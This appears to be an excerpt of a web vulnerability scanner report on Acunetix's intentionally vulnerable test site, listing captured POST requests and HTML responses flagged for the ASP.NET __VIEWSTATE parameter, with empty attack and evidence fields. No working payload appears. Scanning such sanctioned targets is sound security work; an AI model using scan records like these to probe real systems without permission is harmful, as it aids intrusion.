Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8415&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAAnKL9toIZGRkwJnEZ3360N33%2BRRgRJmGqW1yB4g%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKEicWgCQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXNpeFWi1UnHOZcvS7sBQgkrnlANg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:22 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCAAnKL9toIZGRkwJnEZ3360N33+RRgRJmGqW1yB4g=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKEicWgCQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gXNpeFWi1UnHOZcvS7sBQgkrnlANg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:White" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8403&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCADXUd7doIZGRkGm0gfZriQyKfSeJMgejbOG5BChM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL3qu39BQL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUwkC9WyDiK6lf585oZaRAvc0tYkg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:04:26 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgCADXUd7doIZGRkGm0gfZriQyKfSeJMgejbOG5BChM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL3qu39BQL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gUwkC9WyDiK6lf585oZaRAvc0tYkg==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:White" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1099 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
